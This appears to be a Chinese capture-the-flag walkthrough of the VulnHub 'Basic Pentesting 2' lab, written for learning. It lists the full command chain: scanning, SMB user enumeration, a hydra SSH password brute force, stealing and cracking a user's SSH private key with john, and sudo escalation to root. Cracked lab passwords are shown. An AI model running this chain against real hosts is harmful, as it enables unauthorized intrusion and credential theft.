靶机下载地址:
https://www.vulnhub.com/entry/basic-pentesting-2,241/https://www.vulnhub.com/entry/basic-pentesting-2,241/
1. 主机发现+端口扫描+目录扫描+敏感信息获取
1.1. 主机发现
nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:1D:4A:27'
1.2. 端口扫描
nmap -p- 192.168.7.88
1.3. 目录扫描
dirb http://192.168.7.88
1.4. 敏感信息收集
whatweb http://192.168.7.88
2. WEB打点寻找漏洞点
2.1. 进入80端口
无有用信息
2.2. 拼接扫描到的目录
拼接/development
存在两个文件,逐个点开看看
dev.txt:
j.txt:
信息总结:
提了SMB版本以及配置完成的信息 -》正好开放了445端口,等等可以试试看
K用户回复J用户 -》
1.说他一直在审核 /etc/shadow 的内容
2.K说J存在着弱密码问题
2.3. 445端口
利用kali的enum4linux工具枚举SMB服务中的信息;
enum4linux -a -o 192.168.7.88
成功的排列出两个用户名信息,也符合上述中交流的J和K;
kay
jan
2.4. Getshell
我们已知账户名,而且又知道J用户存在弱密码问题,那就利用kali的九头蛇爆破试试咯
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.7.88 -t 64
# 得知密码为
# armando
3. 权限提升
3.1. 连接ssh
1.连接ssh
ssh jan@192.168.7.88
2.老规矩,查看是否存在特权命令,或是否存在具有root\all权限的可利用的可执行文件,没有利用点
suod -l
3.逐个查看可疑的文件 -> /home/kay/目录存在pass.bak文件,但无访问权限;
但是可以访问kay用户的ssh私钥文件
cd .ssh
ls -al
cat id_rsa
3.复制私钥至本地,赋予执行权限【注意格式问题】
chmod +x 1.txt
4.通过python转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码。
python /usr/share/john/ssh2john.py 1 > ssh_login
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_login
获得密钥:beeswax
5.尝试登录ssh -> 成功
ssh -i 1 kay@192.168.7.88
3.2. 尝试提权
1.老规矩,查看是否存在特权命令,密码不大行,看看文件吧
sudo -l
2.有一个pass.bak
文件,查看一下
cat pass.bak
# 有一段代码
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
这个可能是kay用户的密码,尝试使用命令sudo -l
,输入密码成功 -> 权限是all,直接提权 ->成功
sudo su